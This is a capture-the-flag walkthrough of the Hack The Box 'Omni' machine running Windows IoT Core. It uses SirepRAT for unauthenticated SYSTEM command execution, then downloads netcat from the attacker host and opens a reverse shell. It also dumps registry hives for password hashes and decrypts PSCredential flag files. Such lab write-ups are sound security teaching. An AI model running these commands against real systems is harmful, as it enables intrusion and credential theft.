NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-24 10:18 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
Initiating Ping Scan at 10:18
Scanning 10.10.10.204 [4 ports]
Completed Ping Scan at 10:18, 0.52s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:18
Scanning omni.htb (10.10.10.204) [1000 ports]
Discovered open port 135/tcp on 10.10.10.204
Discovered open port 8080/tcp on 10.10.10.204
Completed SYN Stealth Scan at 10:18, 29.60s elapsed (1000 total ports)
Initiating Service scan at 10:18
Scanning 2 services on omni.htb (10.10.10.204)
Completed Service scan at 10:18, 8.70s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against omni.htb (10.10.10.204)
Retrying OS detection (try #2) against omni.htb (10.10.10.204)
Initiating Traceroute at 10:19
Completed Traceroute at 10:19, 0.43s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 10:19
Completed Parallel DNS resolution of 2 hosts. at 10:19, 0.32s elapsed
NSE: Script scanning 10.10.10.204.
Initiating NSE at 10:19
Completed NSE at 10:19, 8.33s elapsed
Initiating NSE at 10:19
Completed NSE at 10:19, 1.43s elapsed
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Nmap scan report for omni.htb (10.10.10.204)
Host is up (0.36s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE VERSION
135/tcp  open  msrpc   Microsoft Windows RPC
8080/tcp open  upnp    Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (86%)
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   410.29 ms 10.10.14.1
2   412.53 ms omni.htb (10.10.10.204)

NSE: Script Post-scanning.
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.23 seconds
           Raw packets sent: 2100 (96.092KB) | Rcvd: 1023 (593.916KB)
ENUMERATION
First we need to work out what this device is and which OS it runs. The nmap OS fingerprint (Windows XP/7) is not to be trusted here: nmap itself warns that it had no closed port to compare against. The useful clue is port 8080, an HTTP service behind Microsoft-HTTPAPI/2.0 that answers 401 with "Basic realm=Windows Device Portal". Windows Device Portal is the web management interface of Windows 10 IoT Core, and a search for "omni" together with that hint points at an IoT Core device rather than a desktop Windows box (the build number 10.0.17763.107 reported later by our shell confirms it).
So we need an attack path for Windows IoT Core, but first let's check both open ports.
PORT 8080
The Device Portal asks for HTTP Basic credentials (the 401 above) and we have none yet, so we move on.
PORT 135
Here rpcclient times out. Note that rpcclient reaches the SAMR/LSARPC pipes over SMB (445/139), not through the endpoint mapper on 135, and SMB is among the filtered ports, so the timeout is expected rather than a sign of a misconfiguration.
┌─[✗]─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #rpcclient -U " " 10.10.10.204
Enter TESTING\ 's password:
Cannot connect to server.  Error was NT_STATUS_IO_TIMEOUT
So let's search for Windows IoT Core exploitation.
The first result is the SafeBreach Labs GitHub project SirepRAT – RCE as SYSTEM on Windows IoT Core. It speaks to the Sirep Test Service that Windows IoT Core exposes: the service accepts commands without any authentication and runs them as SYSTEM. It listens on a TCP port that is not in nmap's default top-1000 list, which is why the scan above did not show it; a full-range scan (nmap -p-) would.
Just clone the repository to your machine.
Reading through the available commands, these two are the ones we need. LaunchCommandWithOutput runs an executable given by --cmd with the command line in --args and, with --return_output, sends its stdout and stderr back to us; the {{userprofile}} form is SirepRAT's own placeholder for an environment variable on the target. The examples below are copied from the README (192.168.3.17 is the README's target, not ours):
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"
So first let's run the basic command.
┌─[✗]─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 6, payload peek: 'omni'>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: ''>
Without --v the tool only shows a short payload peek of each result stream; here the peek already contains the hostname, omni. Adding --v prints the full output stream.
┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe" --v
---------
omni

---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 6, payload peek: 'omni'>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: ''>
That gives us the full output.
Now let's try the second command. We leave out --as_logged_on_user, so the command runs in the service's own context:
┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}" --v
---------
C:\Data\Users\System

---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 22, payload peek: 'C:\Data\Users\System'>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: ''>
The profile path C:\Data\Users\System confirms that our commands run as SYSTEM. The output also shows how the tool has to be driven: --cmd must be a full path to an executable, and --args is handed to that executable as its command line, so cmd.exe /c only gets us as far as cmd built-ins. For anything richer, such as downloading a file, we point --cmd at powershell.exe and pass the PowerShell command in --args, as in the transfer step below.
Now let's get a reverse shell so we can work on the machine properly.
STEPS WE ARE GOING TO FOLLOW NOW
1. Transfer a 64-bit netcat (nc64.exe) to the omni machine.
2. Execute it there to connect back to a listener on our machine.
TRANSFER THE NC.EXE
Serve nc64.exe over HTTP from the attacking machine first (for example with python3 -m http.server 80 in the directory that holds it). powershell.exe accepts /c here as an abbreviation of its -Command switch. Dropping the binary into C:\Data\Users\app is deliberate: we will reuse it later from the app user's own shell.
┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" --args "/c Invoke-Webrequest -Uri http://10.10.14.43/nc64.exe -OutFile C:\Data\Users\app\nc64.exe" --v
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
EXECUTING NC64.EXE THROUGH CMD.EXE
┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\Data\Users\app\nc64.exe 10.10.14.43 9002 -e cmd.exe" --v
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
GETTING REVERSE SHELL
┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.10.204] 49680
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>
Looking around the user directories we find user.txt and root.txt, plus an iot-admin.xml, and all three are PowerShell Export-Clixml files holding PSCredential objects. The password inside such a file is a SecureString protected with DPAPI under the key of the user who exported it, so Import-Clixml only yields the plaintext when run as that same user; a SYSTEM shell does not read them directly. To get into the app user's context we therefore save the SAM, SECURITY and SYSTEM registry hives, which SYSTEM can do with reg.exe, and crack the local password hashes offline.
LINK TO HELP YOU :
┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.10.204] 49680
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>reg.exe save hklm\sam sam.save
The operation completed successfully.

C:\windows\system32>reg.exe save hklm\security security.save
The operation completed successfully.

C:\windows\system32>reg.exe save hklm\system system.save
The operation completed successfully.
Copy the three .save files to the attacking machine (transfer not shown) and extract the secrets offline with Impacket's secretsdump.py in LOCAL mode:
┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM
dpapi_machinekey:0xdc2beb4869328393b57ea9a28aeff84932c3e3ef
dpapi_userkey:0x6760a0b981e854b66007b33962764d5043f3d013
[*] NL$KM
 0000   14 07 22 73 99 42 B0 ED  F5 11 9A 60 FD A1 10 EF   .."s.B.....`....
 0010   DF 19 3C 6C 22 F2 92 0C  34 B1 6D 78 CC A7 0D 14   ..<l"...4.mx....
 0020   02 7B 81 04 1E F6 1C 66  69 75 69 84 A7 31 53 26   .{.....fiui..1S&
 0030   A3 6B A9 C9 BF 18 A8 EF  10 36 DB C2 CC 27 73 3D   .k.......6...'s=
NL$KM:140722739942b0edf5119a60fda110efdf193c6c22f2920c34b16d78cca70d14027b81041ef61c6669756984a7315326a36ba9c9bf18a8ef1036dbc2cc27733d
[*] Cleaning up...
These are NT hashes (the LM column is the constant aad3b435b51404eeaad3b435b51404ee, meaning LM hashes are disabled). NT hashes are not decrypted but cracked: the same unsalted algorithm, MD4 over the UTF-16LE password, is run over candidate passwords and the results compared, for example with hashcat -m 1000 or john --format=NT. The app user's hash falls to a wordlist:
app : mesh5143
GETTING USER ACCESS
WinRM is not exposed (5985 was not among the open ports), so evil-winrm is out; instead we try the credentials on the Windows Device Portal login on port 8080.
Once logged in, the portal offers a Run command page, which is effectively a shell running as the logged-in user.
We use it to run the nc64.exe we already dropped, this time spawning powershell.exe rather than cmd.exe, since Import-Clixml is a PowerShell cmdlet (the listener banner below shows Windows PowerShell).
With a shell as app we can now decrypt the files, because we are the user whose DPAPI key protects them.
LINKS TO HELP YOU IN DECRYPTING FILES:
https://www.red-gate.com/simple-talk/sysadmin/powershell/portable-objects-in-powershell-with-clixml/
https://devblogs.microsoft.com/scripting/decrypt-powershell-secure-string-password/
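Before decrypting, it helps to see what these files actually contain. The following is an added example, not code from the walkthrough or from Microsoft: a Python parser for an Export-Clixml PSCredential file that pulls out the username and checks whether the SecureString is a DPAPI blob, which is what ties the file to the exporting user's session. The sample document is constructed to match the Export-Clixml layout; its username and the bytes after the DPAPI header are invented.

```python
"""Inspect a PowerShell Export-Clixml credential file without PowerShell.

Added example, not part of the original walkthrough.  Export-Clixml stores a
PSCredential's password as an <SS> element holding a hex-encoded DPAPI blob
(CryptProtectData output) bound to the exporting user's master key, so only
that user, or someone holding that user's DPAPI master key, can recover the
plaintext.  That is why a SYSTEM shell could not simply read user.txt.
"""
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
# CryptProtectData blob header: dwVersion = 1, then the DPAPI provider GUID
# {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} in little-endian field order.
DPAPI_HEADER = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")

# Constructed sample in the Export-Clixml layout.  The username and the bytes
# after the DPAPI header are made up; nothing here comes from the target.
SAMPLE_CLIXML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">omni\\app</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb00000000000102030405060708090a0b0c0d0e0f</SS>
    </Props>
  </Obj>
</Objs>
"""


def inspect_credential(clixml: str) -> dict:
    """Return the PSCredential's username and how its password is protected."""
    root = ET.fromstring(clixml)
    type_names = [t.text for t in root.iter(f"{{{PS_NS}}}T")]
    if "System.Management.Automation.PSCredential" not in type_names:
        raise ValueError("not an exported PSCredential")

    # Collect the N="..." properties with their element kind (S, SS, ...).
    props = {}
    for el in root.iter():
        name = el.get("N")
        if name:
            props[name] = (el.tag.split("}")[-1], el.text or "")

    kind, ss_hex = props["Password"]
    if kind != "SS":
        raise ValueError("Password is not a SecureString (<SS>) element")
    blob = bytes.fromhex(ss_hex)
    # A blob starting with the DPAPI header was produced by CryptProtectData
    # under the exporting user's key; anything else needs a closer look.
    protection = "dpapi-user" if blob.startswith(DPAPI_HEADER) else "unknown"
    return {
        "username": props["UserName"][1],
        "protection": protection,
        "blob_bytes": len(blob),
    }


if __name__ == "__main__":
    print(inspect_credential(SAMPLE_CLIXML))
```

Pointed at iot-admin.xml this tells you whose credential it is before you have a shell as that user, and a "dpapi-user" result explains why Import-Clixml has to run in that user's context rather than under SYSTEM.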
┌─[✗]─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #rlwrap nc -lnvp 9009
listening on [any] 9009 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.10.204] 49676
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32> cd c:\DATA\Users\App
PS C:\DATA\Users\app> ls

    Directory: C:\DATA\Users\app

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        7/4/2020   7:28 PM                3D Objects
d-r---        7/4/2020   7:28 PM                Documents
d-r---        7/4/2020   7:28 PM                Downloads
d-----        7/4/2020   7:28 PM                Favorites
d-r---        7/4/2020   7:28 PM                Music
d-r---        7/4/2020   7:28 PM                Pictures
d-r---        7/4/2020   7:28 PM                Videos
-ar---        7/4/2020   8:20 PM            344 hardening.txt
-ar---        7/4/2020   8:14 PM           1858 iot-admin.xml
-a----       8/24/2020   4:38 AM          45272 nc64.exe
-ar---        7/4/2020   9:53 PM           1958 user.txt

PS C:\DATA\Users\app> $cli = Import-Clixml C:\DATA\Users\app\user.txt
PS C:\DATA\Users\app> $cli | Get-Member

   TypeName: System.Management.Automation.PSCredential

Name                 MemberType Definition
----                 ---------- ----------
Equals               Method     bool Equals(System.Object obj)
GetHashCode          Method     int GetHashCode()
GetNetworkCredential Method     System.Net.NetworkCredential GetNetworkCrede...
GetObjectData        Method     void GetObjectData(Microsoft.PowerShell.Core...
GetType              Method     type GetType()
ToString             Method     string ToString()
Password             Property   securestring Password {get;}
UserName             Property   string UserName {get;}

PS C:\DATA\Users\app> $cli.GetNetworkCredential().Password
7cfd50f6bc34db3204898f1505ad9d70
HERE WE GO WITH USER FLAG
NOW WE HAVE ONE MORE FILE, iot-admin.xml, IN THE SAME FORMAT, SO LET'S DECRYPT THAT TOO
PS C:\DATA\Users\app> $cli = Import-Clixml C:\DATA\Users\app\iot-admin.xml
PS C:\DATA\Users\app> $cli.GetNetworkCredential().Password
_1nt3rn37ofTh1nGz
PS C:\DATA\Users\app>
That gives us another password, and the file name suggests it belongs to the administrator account. evil-winrm still cannot be used (WinRM is not exposed), but the pair works on the Device Portal login:
administrator : _1nt3rn37ofTh1nGz
So let's get a shell as administrator and decrypt the root flag the same way.
Note that from the app shell an ls in the Administrator directory is denied, so root.txt has to be read from the administrator's own context.
GETTING ROOT ACCESS
Log in to the Device Portal as administrator and repeat the Run command step with nc64.exe to catch a reverse shell on our listener.
This time the shell arrives as administrator:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #rlwrap nc -lnvp 9009
listening on [any] 9009 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.10.204] 49677
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32> cd C:\DATA\Users
PS C:\DATA\Users> cd Administrator
PS C:\DATA\Users\Administrator> ls

    Directory: C:\DATA\Users\Administrator

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        7/3/2020  11:23 PM                3D Objects
d-r---        7/3/2020  11:23 PM                Documents
d-r---        7/3/2020  11:23 PM                Downloads
d-----        7/3/2020  11:23 PM                Favorites
d-r---        7/3/2020  11:23 PM                Music
d-r---        7/3/2020  11:23 PM                Pictures
d-r---        7/3/2020  11:23 PM                Videos
-ar---        7/4/2020   9:48 PM           1958 root.txt

PS C:\DATA\Users\Administrator> $cli = Import-Clixml C:\DATA\Users\Administrator\root.txt
PS C:\DATA\Users\Administrator> $cli.GetNetworkCredential().Password
5dbdce5569e2c4708617c0ce6e9bf11d
PS C:\DATA\Users\Administrator>
Here we go with our root flag
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE